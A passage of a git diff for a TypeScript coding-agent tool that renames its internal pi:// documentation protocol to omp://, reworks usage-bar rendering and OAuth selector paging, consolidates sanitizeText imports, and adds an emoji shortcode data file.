(path.isAbsolute(filename)) { - throw new Error("Absolute paths are not allowed in pi:// URLs"); + throw new Error("Absolute paths are not allowed in omp:// URLs"); } const normalized = path.posix.normalize(filename.replaceAll("\\", "/")); if (normalized === ".." || normalized.startsWith("../") || normalized.includes("/../")) { - throw new Error("Path traversal (..) is not allowed in pi:// URLs"); + throw new Error("Path traversal (..) is not allowed in omp:// URLs"); } const content = EMBEDDED_DOCS[normalized]; @@ -69,7 +69,7 @@ export class PiProtocolHandler implements ProtocolHandler { const suffix = suggestions.length > 0 ? `\nDid you mean: ${suggestions.join(", ")}` - : "\nUse pi:// to list available files."; + : "\nUse omp:// to list available files."; throw new Error(`Documentation file not found: ${filename}${suffix}`); } diff --git a/packages/coding-agent/src/internal-urls/router.ts b/packages/coding-agent/src/internal-urls/router.ts index 6529d8063..09972fb29 100644 --- a/packages/coding-agent/src/internal-urls/router.ts +++ b/packages/coding-agent/src/internal-urls/router.ts @@ -1,5 +1,5 @@ /** - * Internal URL router for internal protocols (agent://, artifact://, memory://, skill://, rule://, mcp://, pi://, local://). + * Internal URL router for internal protocols (agent://, artifact://, memory://, skill://, rule://, mcp://, omp://, local://). * * One process-global router with one handler per scheme. Access via * `InternalUrlRouter.instance()`. Handlers are stateless; per-session and @@ -11,8 +11,8 @@ import { IssueProtocolHandler, PrProtocolHandler } from "./issue-pr-protocol"; import { LocalProtocolHandler } from "./local-protocol"; import { McpProtocolHandler } from "./mcp-protocol"; import { MemoryProtocolHandler } from "./memory-protocol"; +import { OmpProtocolHandler } from "./omp-protocol"; import { parseInternalUrl } from "./parse"; -import { PiProtocolHandler } from "./pi-protocol"; import { RuleProtocolHandler } from "./rule-protocol"; import { SkillProtocolHandler } from "./skill-protocol"; import type { InternalResource, InternalUrl, ProtocolHandler, ResolveContext } from "./types"; @@ -23,7 +23,7 @@ export class InternalUrlRouter { #handlers = new Map<string, ProtocolHandler>(); constructor() { - this.register(new PiProtocolHandler()); + this.register(new OmpProtocolHandler()); this.register(new AgentProtocolHandler()); this.register(new ArtifactProtocolHandler()); this.register(new MemoryProtocolHandler()); diff --git a/packages/coding-agent/src/internal-urls/types.ts b/packages/coding-agent/src/internal-urls/types.ts index 8c0b71020..40efec558 100644 --- a/packages/coding-agent/src/internal-urls/types.ts +++ b/packages/coding-agent/src/internal-urls/types.ts @@ -1,7 +1,7 @@ /** * Types for the internal URL routing system. * - * Internal URLs (agent://, artifact://, memory://, skill://, rule://, mcp://, pi://, local://) are resolved by tools like read, + * Internal URLs (agent://, artifact://, memory://, skill://, rule://, mcp://, omp://, local://) are resolved by tools like read, * providing access to agent outputs and server resources without exposing filesystem paths. */ diff --git a/packages/coding-agent/src/lsp/types.ts b/packages/coding-agent/src/lsp/types.ts index 876ec5a09..96b6a1f6d 100644 --- a/packages/coding-agent/src/lsp/types.ts +++ b/packages/coding-agent/src/lsp/types.ts @@ -22,17 +22,14 @@ export const lspSchema = z.object({ "capabilities", "request", ]), - file: z.string().describe("File path or source path for rename_file").optional(), - line: z.number().describe("Line number (1-indexed)").optional(), - symbol: z.string().describe("Symbol/substring to locate on the line").optional(), - query: z.string().describe("Search query, code-action selector, or LSP method name for action=request").optional(), - new_name: z.string().describe("New name for rename, or destination path for rename_file").optional(), - apply: z.boolean().describe("Apply edits (default: true for rename/rename_file)").optional(), - timeout: z.number().describe("Request timeout in seconds").optional(), - payload: z - .string() - .describe("JSON-encoded params for action=request. When omitted, params are auto-built from file/line/symbol.") - .optional(), + file: z.string().describe("file path or source path for rename_file").optional(), + line: z.number().describe("line number (1-indexed)").optional(), + symbol: z.string().describe("symbol substring on the line").optional(), + query: z.string().describe("search query or code-action selector").optional(), + new_name: z.string().describe("new symbol name or destination path").optional(), + apply: z.boolean().describe("apply edits").optional(), + timeout: z.number().describe("request timeout in seconds").optional(), + payload: z.string().describe("json-encoded request params").optional(), }); export type LspParams = z.infer<typeof lspSchema>; diff --git a/packages/coding-agent/src/main.ts b/packages/coding-agent/src/main.ts index 3f4a08344..6ace23ea1 100644 --- a/packages/coding-agent/src/main.ts +++ b/packages/coding-agent/src/main.ts @@ -1003,6 +1003,9 @@ export async function runRootCommand( initialMessage, initialImages, }); + if ($env.PI_TIMING) { + logger.printTimings(); + } await session.dispose(); stopThemeWatcher(); await postmortem.quit(0); diff --git a/packages/coding-agent/src/mcp/tool-bridge.ts b/packages/coding-agent/src/mcp/tool-bridge.ts index 811bc4cff..0340d0df1 100644 --- a/packages/coding-agent/src/mcp/tool-bridge.ts +++ b/packages/coding-agent/src/mcp/tool-bridge.ts @@ -5,7 +5,7 @@ */ import type { AgentToolUpdateCallback } from "@oh-my-pi/pi-agent-core"; import type { TSchema } from "@oh-my-pi/pi-ai"; -import { sanitizeSchemaForMCP } from "@oh-my-pi/pi-ai/utils/schema"; +import { normalizeSchemaForMCP } from "@oh-my-pi/pi-ai/utils/schema"; import { untilAborted } from "@oh-my-pi/pi-utils"; import type { SourceMeta } from "../capability/types"; import type { @@ -231,7 +231,7 @@ export class MCPTool implements CustomTool<TSchema, MCPToolDetails> { this.name = createMCPToolName(connection.name, tool.name); this.label = `${connection.name}/${tool.name}`; this.description = tool.description ?? `MCP tool from ${connection.name}`; - this.parameters = sanitizeSchemaForMCP(tool.inputSchema) as TSchema; + this.parameters = normalizeSchemaForMCP(tool.inputSchema) as TSchema; this.mcpToolName = tool.name; this.mcpServerName = connection.name; } @@ -324,7 +324,7 @@ export class DeferredMCPTool implements CustomTool<TSchema, MCPToolDetails> { this.name = createMCPToolName(serverName, tool.name); this.label = `${serverName}/${tool.name}`; this.description = tool.description ?? `MCP tool from ${serverName}`; - this.parameters = sanitizeSchemaForMCP(tool.inputSchema) as TSchema; + this.parameters = normalizeSchemaForMCP(tool.inputSchema) as TSchema; this.mcpToolName = tool.name; this.mcpServerName = serverName; this.#fallbackProvider = source?.provider; diff --git a/packages/coding-agent/src/modes/components/bash-execution.ts b/packages/coding-agent/src/modes/components/bash-execution.ts index 3eacb120f..2427e5507 100644 --- a/packages/coding-agent/src/modes/components/bash-execution.ts +++ b/packages/coding-agent/src/modes/components/bash-execution.ts @@ -2,7 +2,6 @@ * Component for displaying bash command execution with streaming output. */ -import { sanitizeText } from "@oh-my-pi/pi-natives"; import { Container, Ellipsis, @@ -14,6 +13,7 @@ import { truncateToWidth, visibleWidth, } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { theme } from "../../modes/theme/theme"; import type { TruncationMeta } from "../../tools/output-meta"; import { getSixelLineMask, isSixelPassthroughEnabled, sanitizeWithOptionalSixelPassthrough } from "../../utils/sixel"; diff --git a/packages/coding-agent/src/modes/components/diff.ts b/packages/coding-agent/src/modes/components/diff.ts index b52b85580..777b013aa 100644 --- a/packages/coding-agent/src/modes/components/diff.ts +++ b/packages/coding-agent/src/modes/components/diff.ts @@ -1,5 +1,4 @@ -import { sanitizeText } from "@oh-my-pi/pi-natives"; -import { getIndentation } from "@oh-my-pi/pi-utils"; +import { getIndentation, sanitizeText } from "@oh-my-pi/pi-utils"; import * as Diff from "diff"; import { getLanguageFromPath, highlightCode, theme } from "../../modes/theme/theme"; import { type CodeFrameMarker, formatCodeFrameLine, replaceTabs } from "../../tools/render-utils"; diff --git a/packages/coding-agent/src/modes/components/eval-execution.ts b/packages/coding-agent/src/modes/components/eval-execution.ts index 2e12a052a..5b82dfe17 100644 --- a/packages/coding-agent/src/modes/components/eval-execution.ts +++ b/packages/coding-agent/src/modes/components/eval-execution.ts @@ -3,8 +3,8 @@ * Shares the same kernel session as the agent's eval tool. */ -import { sanitizeText } from "@oh-my-pi/pi-natives"; import { Container, type Loader, Text, type TUI } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { highlightCode, theme } from "../../modes/theme/theme"; import type { TruncationMeta } from "../../tools/output-meta"; import { diff --git a/packages/coding-agent/src/modes/components/oauth-selector.ts b/packages/coding-agent/src/modes/components/oauth-selector.ts index dbdf3d1f4..b0cd6ca5f 100644 --- a/packages/coding-agent/src/modes/components/oauth-selector.ts +++ b/packages/coding-agent/src/modes/components/oauth-selector.ts @@ -5,6 +5,8 @@ import { theme } from "../../modes/theme/theme"; import { matchesSelectCancel } from "../../modes/utils/keybinding-matchers"; import type { AuthStorage } from "../../session/auth-storage"; import { DynamicBorder } from "./dynamic-border"; + +const OAUTH_SELECTOR_MAX_VISIBLE = 10; /** * Component that renders an OAuth provider selector. */ @@ -144,7 +146,16 @@ export class OAuthSelectorComponent extends Container { } #updateList(): void { this.#listContainer.clear(); - for (let i = 0; i < this.#allProviders.length; i++) { + + const total = this.#allProviders.length; + const maxVisible = OAUTH_SELECTOR_MAX_VISIBLE; + const startIndex = + total <= maxVisible + ? 0 + : Math.max(0, Math.min(this.#selectedIndex - Math.floor(maxVisible / 2), total - maxVisible)); + const endIndex = Math.min(startIndex + maxVisible, total); + + for (let i = startIndex; i < endIndex; i++) { const provider = this.#allProviders[i]; if (!provider) continue; const isSelected = i === this.#selectedIndex; @@ -163,8 +174,14 @@ export class OAuthSelectorComponent extends Container { this.#listContainer.addChild(new TruncatedText(line, 0, 0)); } + // Scroll indicator when list is windowed + if (startIndex > 0 || endIndex < total) { + const scrollInfo = theme.fg("muted", ` (${this.#selectedIndex + 1}/${total})`); + this.#listContainer.addChild(new TruncatedText(scrollInfo, 0, 0)); + } + // Show "no providers" if empty - if (this.#allProviders.length === 0) { + if (total === 0) { const message = this.#mode === "login" ? "No OAuth providers available" : "No OAuth providers logged in. Use /login first."; this.#listContainer.addChild(new TruncatedText(theme.fg("muted", ` ${message}`), 0, 0)); @@ -191,6 +208,25 @@ export class OAuthSelectorComponent extends Container { this.#statusMessage = undefined; this.#updateList(); } + // Page up - jump up by one visible page + else if (matchesKey(keyData, "pageUp")) { + if (this.#allProviders.length > 0) { + this.#selectedIndex = Math.max(0, this.#selectedIndex - OAUTH_SELECTOR_MAX_VISIBLE); + } + this.#statusMessage = undefined; + this.#updateList(); + } + // Page down - jump down by one visible page + else if (matchesKey(keyData, "pageDown")) { + if (this.#allProviders.length > 0) { + this.#selectedIndex = Math.min( + this.#allProviders.length - 1, + this.#selectedIndex + OAUTH_SELECTOR_MAX_VISIBLE, + ); + } + this.#statusMessage = undefined; + this.#updateList(); + } // Enter else if (matchesKey(keyData, "enter") || matchesKey(keyData, "return") || keyData === "\n") { const selectedProvider = this.#allProviders[this.#selectedIndex]; diff --git a/packages/coding-agent/src/modes/components/tool-execution.ts b/packages/coding-agent/src/modes/components/tool-execution.ts index 5d39937b2..1dd14c472 100644 --- a/packages/coding-agent/src/modes/components/tool-execution.ts +++ b/packages/coding-agent/src/modes/components/tool-execution.ts @@ -1,5 +1,4 @@ import type { AgentTool } from "@oh-my-pi/pi-agent-core"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; import { Box, type Component, @@ -13,7 +12,7 @@ import { Text, type TUI, } from "@oh-my-pi/pi-tui"; -import { getProjectDir, logger } from "@oh-my-pi/pi-utils"; +import { getProjectDir, logger, sanitizeText } from "@oh-my-pi/pi-utils"; import { EDIT_MODE_STRATEGIES, type EditMode, type PerFileDiffPreview } from "../../edit"; import type { Theme } from "../../modes/theme/theme"; import { theme } from "../../modes/theme/theme"; diff --git a/packages/coding-agent/src/modes/controllers/command-controller.ts b/packages/coding-agent/src/modes/controllers/command-controller.ts index 18ff6acca..a6c3f9c04 100644 --- a/packages/coding-agent/src/modes/controllers/command-controller.ts +++ b/packages/coding-agent/src/modes/controllers/command-controller.ts @@ -374,10 +374,15 @@ export class CommandController { const openaiWebsocketSetting = this.ctx.settings.get("providers.openaiWebsockets") ?? "auto"; const preferOpenAICodexWebsockets = openaiWebsocketSetting === "on" ? true : openaiWebsocketSetting === "off" ? false : undefined; + const credentialSource = this.ctx.session.modelRegistry.authStorage.describeCredentialSource( + model.provider, + stats.sessionId, + ); const providerDetails = getProviderDetails({ model, sessionId: stats.sessionId, authMode, + credentialSource, preferWebsockets: preferOpenAICodexWebsockets, providerSessionState: this.ctx.session.providerSessionState, }); @@ -503,7 +508,8 @@ export class CommandController { return; } - const output = renderUsageReports(usageReports, theme, Date.now()); + const availableWidth = Math.max(40, (this.ctx.ui.terminal.columns ?? 100) - 2); + const output = renderUsageReports(usageReports, theme, Date.now(), availableWidth); this.ctx.chatContainer.addChild(new Spacer(1)); this.ctx.chatContainer.addChild(new Text(output, 1, 0)); this.ctx.ui.requestRender(); @@ -1237,8 +1243,8 @@ export class CommandController { } } -const BAR_WIDTH = 24; -const COLUMN_WIDTH = BAR_WIDTH + 2; +const BAR_WIDTH_MAX = 24; +const BAR_WIDTH_MIN = 4; function renderJobLine(job: AsyncJobSnapshotItem, now: number): string { const duration = formatDuration(Math.max(0, now - job.startTime)); @@ -1266,6 +1272,7 @@ function truncateJobLabel(label: string, maxWidth: number): string { return `${out}…`; } + function formatProviderName(provider: string): string { return provider .split(/[-_]/g) @@ -1277,10 +1284,6 @@ function formatNumber(value: number, maxFractionDigits = 1): string { return new Intl.NumberFormat("en-US", { maximumFractionDigits: maxFractionDigits }).format(value); } -function formatUsedAccounts(value: number): string { - return `${value.toFixed(2)} used`; -} - function resolveProviderAuthMode(authStorage: AuthStorage, provider: string): string { if (authStorage.hasOAuth(provider)) { return "oauth"; @@ -1364,11 +1367,39 @@ function formatResetShort(limit: UsageLimit, nowMs: number): string | undefined return undefined; } -function formatAccountHeader(limit: UsageLimit, report: UsageReport, index: number, nowMs: number): string { - const label = formatAccountLabel(limit, report, index); - const reset = formatResetShort(limit, nowMs); - if (!reset) return label; - return `${label} (${reset})`; +function formatAccountHeaderRow( + limits: UsageLimit[], + reports: UsageReport[], + nowMs: number, + columnWidth: number, + uiTheme: typeof theme, +): string[] { + const parts = limits.map((limit, index) => { + const reset = formatResetShort(limit, nowMs); + return { + label: formatAccountLabel(limit, reports[index], index), + suffix: reset ? `(${reset})` : "", + }; + }); + const maxSuffixWidth = parts.reduce((max, p) => Math.max(max, visibleWidth(p.suffix)), 0); + const gap = maxSuffixWidth > 0 ? 1 : 0; + const prefixBudget = columnWidth - maxSuffixWidth - gap; + + // If suffix can't share the cell with at least `x…`, fall back to whole-label truncation. + if (prefixBudget < 2) { + return parts.map(p => { + const full = p.suffix ? `${p.label} ${p.suffix}` : p.label; + return padColumn(truncateJobLabel(full, columnWidth), columnWidth); + }); + } + + return parts.map(p => { + const prefix = truncateJobLabel(p.label, prefixBudget); + const prefixCell = prefix + " ".repeat(prefixBudget - visibleWidth(prefix)); + if (!p.suffix) return prefixCell + " ".repeat(maxSuffixWidth + gap); + const suffixPad = " ".repeat(maxSuffixWidth - visibleWidth(p.suffix)); + return `${prefixCell} ${suffixPad}${uiTheme.fg("dim", p.suffix)}`; + }); } function padColumn(text: string, width: number): string { @@ -1395,10 +1426,8 @@ function formatAggregateAmount(limits: UsageLimit[]): string { .filter((value): value is number => value !== undefined); if (fractions.length === limits.length && fractions.length > 0) { const sum = fractions.reduce((total, value) => total + value, 0); - const usedPct = Math.max(sum * 100, 0); - const remainingPct = Math.max(0, limits.length * 100 - usedPct); - const avgRemaining = limits.length > 0 ? remainingPct / limits.length : remainingPct; - return `${formatUsedAccounts(sum)} (${formatNumber(avgRemaining)}% left)`; + const avgRemaining = Math.max(0, ((limits.length - sum) / limits.length) * 100); + return `${formatNumber(avgRemaining)}% free`; } const amounts = limits @@ -1407,13 +1436,11 @@ function formatAggregateAmount(limits: UsageLimit[]): string { if (amounts.length === limits.length && amounts.length > 0) { const totalUsed = amounts.reduce((sum, amount) => sum + (amount.used ?? 0), 0); const totalLimit = amounts.reduce((sum, amount) => sum + (amount.limit ?? 0), 0); - const usedPct = totalLimit > 0 ? (totalUsed / totalLimit) * 100 : 0; - const remainingPct = Math.max(0, 100 - usedPct); - const usedAccounts = totalLimit > 0 ? (usedPct / 100) * limits.length : 0; - return `${formatUsedAccounts(usedAccounts)} (${formatNumber(remainingPct)}% left)`; + const remainingPct = totalLimit > 0 ? Math.max(0, 100 - (totalUsed / totalLimit) * 100) : 0; + return `${formatNumber(remainingPct)}% free`; } - return `Accounts: ${limits.length}`; + return `${limits.length} accts`; } function resolveResetRange(limits: UsageLimit[], nowMs: number): string | null { @@ -1444,20 +1471,47 @@ function resolveStatusColor(status: UsageLimit["status"]): "success" | "warning" return "dim"; } -function renderUsageBar(limit: UsageLimit, uiTheme: typeof theme): string { +function renderUsageBar(limit: UsageLimit, uiTheme: typeof theme, barWidth: number): string { const fraction = resolveFraction(limit); if (fraction === undefined) { - return uiTheme.fg("dim", `[${"·".repeat(BAR_WIDTH)}]`); + return uiTheme.fg("dim", "·".repeat(barWidth)); } const clamped = Math.min(Math.max(fraction, 0), 1); - const filled = Math.round(clamped * BAR_WIDTH); - const filledBar = "█".repeat(filled); - const emptyBar = "░".repeat(Math.max(0, BAR_WIDTH - filled)); + const exact = clamped * barWidth; + const fullCells = Math.floor(exact); + const remainder = exact - fullCells; + let partial = ""; + if (remainder >= 2 / 3) partial = "▓"; + else if (remainder >= 1 / 3) partial = "▒"; + const leading = "█".repeat(fullCells) + partial; + const empty = "░".repeat(Math.max(0, barWidth - fullCells - (partial ? 1 : 0))); const color = resolveStatusColor(limit.status); - return `${uiTheme.fg("dim", "[")}${uiTheme.fg(color, filledBar)}${uiTheme.fg("dim", emptyBar)}${uiTheme.fg("dim", "]")}`; + return `${uiTheme.fg(color, leading)}${uiTheme.fg("dim", empty)}`; } -function renderUsageReports(reports: UsageReport[], uiTheme: typeof theme, nowMs: number): string { +/** + * Pick a per-column width so n bars + a trailing amount string fit in `available` columns. + * Falls back to the minimum when the terminal is too narrow rather than wrapping. + */ +function resolveColumnWidth(count: number, available: number, trailing: number): number { + if (count <= 0) return BAR_WIDTH_MAX; + const indent = 2; + const gaps = count - 1; + const spaceForBars = available - indent - gaps - (trailing > 0 ? trailing + 1 : 0); + const ideal = Math.floor(spaceForBars / count); + const min = BAR_WIDTH_MIN; + const max = BAR_WIDTH_MAX; + if (ideal < min) return min; + if (ideal > max) return max; + return ideal; +} + +function renderUsageReports( + reports: UsageReport[], + uiTheme: typeof theme, + nowMs: number, + availableWidth: number, +): string { const lines: string[] = []; const latestFetchedAt = Math.max(...reports.map(report => report.fetchedAt ?? 0)); const headerSuffix = latestFetchedAt ? ` (${formatDuration(nowMs - latestFetchedAt)} ago)` : ""; @@ -1506,7 +1560,7 @@ function renderUsageReports(reports: UsageReport[], uiTheme: typeof theme, nowMs lines.push(uiTheme.bold(uiTheme.fg("accent", providerName))); - for (const group of limitGroups.values()) { + const renderableGroups = Array.from(limitGroups.values()).map(group => { const entries = group.limits.map((limit, index) => ({ limit, report: group.reports[index], @@ -1521,18 +1575,25 @@ function renderUsageReports(reports: UsageReport[], uiTheme: typeof theme, nowMs }); const sortedLimits = entries.map(entry => entry.limit); const sortedReports = entries.map(entry => entry.report); + return { group, sortedLimits, sortedReports, amountText: formatAggregateAmount(sortedLimits) }; + }); + const sectionCount = renderableGroups.reduce((max, g) => Math.max(max, g.sortedLimits.length), 0); + const sectionTrailing = renderableGroups.reduce((max, g) => Math.max(max, visibleWidth(g.amountText)), 0); + const sectionColumnWidth = resolveColumnWidth(sectionCount, availableWidth, sectionTrailing); + + for (const { group, sortedLimits, sortedReports, amountText } of renderableGroups) { const status = resolveAggregateStatus(sortedLimits); const statusIcon = resolveStatusIcon(status, uiTheme); const windowSuffix = formatWindowSuffix(group.label, group.windowLabel, uiTheme); lines.push(`${statusIcon} ${uiTheme.bold(group.label)} ${windowSuffix}`.trim()); - const accountLabels = sortedLimits.map((limit, index) => - padColumn(formatAccountHeader(limit, sortedReports[index], index, nowMs), COLUMN_WIDTH), - ); + const accountLabels = formatAccountHeaderRow(sortedLimits, sortedReports, nowMs, sectionColumnWidth, uiTheme); lines.push(` ${accountLabels.join(" ")}`.trimEnd()); - const bars = sortedLimits.map(limit => padColumn(renderUsageBar(limit, uiTheme), COLUMN_WIDTH)); - lines.push(` ${bars.join(" ")} ${formatAggregateAmount(sortedLimits)}`.trimEnd()); + const bars = sortedLimits.map(limit => + padColumn(renderUsageBar(limit, uiTheme, sectionColumnWidth), sectionColumnWidth), + ); + lines.push(` ${bars.join(" ")} ${amountText}`.trimEnd()); const resetText = sortedLimits.length <= 1 ? resolveResetRange(sortedLimits, nowMs) : null; if (resetText) { lines.push(` ${uiTheme.fg("dim", resetText)}`.trimEnd()); diff --git a/packages/coding-agent/src/modes/controllers/input-controller.ts b/packages/coding-agent/src/modes/controllers/input-controller.ts index 86c51040f..2aa63bd2b 100644 --- a/packages/coding-agent/src/modes/controllers/input-controller.ts +++ b/packages/coding-agent/src/modes/controllers/input-controller.ts @@ -1,9 +1,9 @@ import * as fs from "node:fs/promises"; import { type AgentMessage, ThinkingLevel } from "@oh-my-pi/pi-agent-core"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; import type { AutocompleteProvider, SlashCommand } from "@oh-my-pi/pi-tui"; -import { $env } from "@oh-my-pi/pi-utils"; -import { settings } from "../../config/settings"; +import { $env, sanitizeText } from "@oh-my-pi/pi-utils"; +import { isSettingsInitialized, settings } from "../../config/settings"; +import { expandEmoticons } from "../../modes/emoji-autocomplete"; import { createPromptActionAutocompleteProvider } from "../../modes/prompt-action-autocomplete"; import { theme } from "../../modes/theme/theme"; import type { InteractiveModeContext } from "../../modes/types"; @@ -187,6 +187,7 @@ export class InputController { setupEditorSubmitHandler(): void { this.ctx.editor.onSubmit = async (text: string) => { text = text.trim(); + if ((!isSettingsInitialized() || settings.get("emojiAutocomplete")) && text) text = expandEmoticons(text); // Empty submit while streaming with queued messages: flush queues immediately if (!text && this.ctx.session.isStreaming && this.ctx.session.queuedMessageCount > 0) { diff --git a/packages/coding-agent/src/modes/data/emojis.json b/packages/coding-agent/src/modes/data/emojis.json new file mode 100644 index 000000000..23d4aff6b --- /dev/null +++ b/packages/coding-agent/src/modes/data/emojis.json @@ -0,0 +1 @@ +{"1":[["100","💯"],["1234","🔢"],["1st_place_medal","🥇"]],"2":[["2nd_place_medal","🥈"]],"3":[["3rd_place_medal","🥉"]],"8":[["8ball","🎱"]],"+":[["+1","👍"]],"-":[["-1","👎"]],"a":[["a","🅰️"],["ab","🆎"],["abacus","🧮"],["abc","🔤"],["abcd","🔡"],["accept","🉑"],["adult","🧑"],["aerial_tramway","🚡"],["afk","🚶"],["agree","👍"],["airplane","✈️"],["alarm_clock","⏰"],["alembic","⚗"],["alien","👽"],["amazing","🤩"],["ambulance","🚑"],["amphora","🏺"],["anchor","⚓"],["angel","👼"],["anger","💢"],["angry","😠"],["anguished","😧"],["ant","🐜"],["applause","👏"],["apple","🍎"],["aquarius","♒"],["aries","♈"],["arrow_backward","◀️"],["arrow_double_down","⏬"],["arrow_double_up","⏫"],["arrow_down","⬇️"],["arrow_down_small","🔽"],["arrow_forward","▶️"],["arrow_heading_down","⤵️"],["arrow_heading_up","⤴️"],["arrow_left","⬅️"],["arrow_lower_left","↙️"],["arrow_lower_right","↘️"],["arrow_right","➡️"],["arrow_right_hook","↪️"],["arrow_up","⬆️"],["arrow_up_down","↕️"],["arrow_up_small","🔼"],["arrow_upper_left","↖️"],["arrow_upper_right","↗️"],["arrows_clockwise","🔃"],["arrows_counterclockwise","🔄"],["art","🎨"],["articulated_lorry","🚛"],["artificial_satellite","🛰"],["asterisk","*⃣"],["astonished","😲"],["athletic_shoe","👟"],["atm","🏧"],["atom_symbol","⚛"],["avocado","🥑"],["awesome","😎"],["aww","🥹"]],"b":[["b","🅱️"],["baby","👶"],["baby_bottle","🍼"],["baby_chick","🐤"],["baby_symbol","🚼"],["back","🔙"],["bacon","🥓"],["badger","🦡"],["badminton","🏸"],["bae","😍"],["bagel","🥯"],["baggage_claim","🛄"],["baguette_bread","🥖"],["balance_scale","⚖"],["balloon","🎈"],["ballot_box","🗳"],["ballot_box_with_check","☑️"],["bamboo","🎍"],["banana","🍌"],["bangbang","‼️"],["bank","🏦"],["bar_chart","📊"],["barber","💈"],["baseball","⚾"],["basket","🧺"],["basketball","🏀"],["basketball_man","⛹"],["basketball_woman","⛹️‍♀️"],["bat","🦇"],["bath","🛀"],["bathtub","🛁"],["battery","🔋"],["bawling","😭"],["bday","🥳"],["beach_umbrella","🏖"],["bear","🐻"],["bearded_person","🧔"],["bed","🛏"],["beer","🍺"],["beers","🍻"],["beetle","🐞"],["beginner","🔰"],["bell","🔔"],["bellhop_bell","🛎"],["bento","🍱"],["bet","👍"],["bike","🚲"],["biking_man","🚴"],["biking_woman","🚴‍♀️"],["bikini","👙"],["billed_hat","🧢"],["biohazard","☣"],["bird","🐦"],["birthday","🎂"],["black_circle","⚫"],["black_flag","🏴"],["black_heart","🖤"],["black_joker","🃏"],["black_large_square","⬛"],["black_medium_small_square","◾"],["black_medium_square","◼️"],["black_nib","✒️"],["black_small_square","▪️"],["black_square_button","🔲"],["blonde_man","👱"],["blonde_woman","👱‍♀️"],["blossom","🌼"],["blowfish","🐡"],["blue_book","📘"],["blue_car","🚙"],["blue_heart","💙"],["blush","😊"],["boar","🐗"],["bomb","💣"],["bone","🦴"],["bookmark","🔖"],["bookmark_tabs","📑"],["books","📚"],["boom","💥"],["boot","👢"],["bored","🥱"],["bouquet","💐"],["bow_and_arrow","🏹"],["bowing_man","🙇"],["bowing_woman","🙇‍♀️"],["bowl_with_spoon","🥣"],["bowling","🎳"],["boxing_glove","🥊"],["boy","👦"],["brain","🧠"],["brb","🏃"],["bread","🍞"],["breastfeeding","🤱"],["brick","🧱"],["bride_with_veil","👰"],["bridge_at_night","🌉"],["briefcase","💼"],["broccoli","🥦"],["broken_heart","💔"],["broom","🧹"],["bruh","😐"],["bs","💩"],["bug","🐛"],["building_construction","🏗"],["bulb","💡"],["bullettrain_front","🚅"],["bullettrain_side","🚄"],["bump","👊"],["burrito","🌯"],["bus","🚌"],["business_suit_levitating","🕴"],["busstop","🚏"],["bust_in_silhouette","👤"],["busts_in_silhouette","👥"],["butterfly","🦋"],["bye","👋"]],"c":[["cactus","🌵"],["cake","🍰"],["calendar","📆"],["call_me_hand","🤙"],["calling","📲"],["camel","🐫"],["camera","📷"],["camera_flash","📸"],["camping","🏕"],["cancer","♋"],["candle","🕯"],["candy","🍬"],["canned_food","🥫"],["canoe","🛶"],["capital_abcd","🔠"],["capricorn","♑"],["card_file_box","🗃"],["card_index","📇"],["card_index_dividers","🗂"],["carousel_horse","🎠"],["carrot","🥕"],["cat","🐱"],["cat2","🐈"],["cd","💿"],["celebrate","🎉"],["chains","⛓"],["champagne","🍾"],["chart","💹"],["chart_with_downwards_trend","📉"],["chart_with_upwards_trend","📈"],["chat","💬"],["checkered_flag","🏁"],["cheese","🧀"],["cherries","🍒"],["cherry_blossom","🌸"],["chess_pawn","♟"],["chestnut","🌰"],["chicken","🐔"],["child","🧒"],["children_crossing","🚸"],["chill","😎"],["chilling","😎"],["chipmunk","🐿"],["chocolate_bar","🍫"],["chopsticks","🥢"],["christmas_tree","🎄"],["church","⛪"],["cinema","🎦"],["circus_tent","🎪"],["city_sunrise","🌇"],["city_sunset","🌆"],["cityscape","🏙"],["cl","🆑"],["clamp","🗜"],["clap","👏"],["clapper","🎬"],["classical_building","🏛"],["climbing_man","🧗‍♂️"],["climbing_woman","🧗‍♀️"],["clinking_glasses","🥂"],["clipboard","📋"],["clock1","🕐"],["clock10","🕙"],["clock1030","🕥"],["clock11","🕚"],["clock1130","🕦"],["clock12","🕛"],["clock1230","🕧"],["clock130","🕜"],["clock2","🕑"],["clock230","🕝"],["clock3","🕒"],["clock330","🕞"],["clock4","🕓"],["clock430","🕟"],["clock5","🕔"],["clock530","🕠"],["clock6","🕕"],["clock630","🕡"],["clock7","🕖"],["clock730","🕢"],["clock8","🕗"],["clock830","🕣"],["clock9","🕘"],["clock930","🕤"],["closed_book","📕"],["closed_lock_with_key","🔐"],["closed_umbrella","🌂"],["cloud","☁️"],["cloud_with_lightning","🌩"],["cloud_with_lightning_and_rain","⛈"],["cloud_with_rain","🌧"],["cloud_with_snow","🌨"],["clown_face","🤡"],["clubs","♣️"],["coat","🧥"],["cocktail","🍸"],["coconut","🥥"],["coffee","☕"],["coffin","⚰"],["cold","🥶"],["cold_sweat","😰"],["comet","☄"],["compass","🧭"],["computer","💻"],["computer_mouse","🖱"],["confetti_ball","🎊"],["confounded","😖"],["confused","😕"],["congrats","🎉"],["congratulations","㊗️"],["construction","🚧"],["construction_worker_man","👷"],["construction_worker_woman","👷‍♀️"],["control_knobs","🎛"],["convenience_store","🏪"],["cookie","🍪"],["cool","🆒"],["copyright","©️"],["corn","🌽"],["correct","✅"],["couch_and_lamp","🛋"],["couple","👫"],["couple_with_heart_man_man","👨‍❤️‍👨"],["couple_with_heart_woman_man","💑"],["couple_with_heart_woman_woman","👩‍❤️‍👩"],["couplekiss_man_man","👨‍❤️‍💋‍👨"],["couplekiss_man_woman","💏"],["couplekiss_woman_woman","👩‍❤️‍💋‍👩"],["cow","🐮"],["cow2","🐄"],["cowboy_hat_face","🤠"],["crab","🦀"],["crayon","🖍"],["credit_card","💳"],["crescent_moon","🌙"],["cricket","🏏"],["cringe","😖"],["crocodile","🐊"],["croissant","🥐"],["crossed_fingers","🤞"],["crossed_flags","🎌"],["crossed_swords","⚔"],["crown","👑"],["crush","🥰"],["cry","😢"],["crying","😭"],["crying_cat_face","😿"],["crystal_ball","🔮"],["cucumber","🥒"],["cup_with_straw","🥤"],["cupcake","🧁"],["cupid","💘"],["curling_stone","🥌"],["curly_loop","➰"],["currency_exchange","💱"],["curry","🍛"],["custard","🍮"],["customs","🛃"],["cya","👋"],["cyclone","🌀"]],"d":[["dagger","🗡"],["dancer","💃"],["dancing_men","👯‍♂️"],["dancing_women","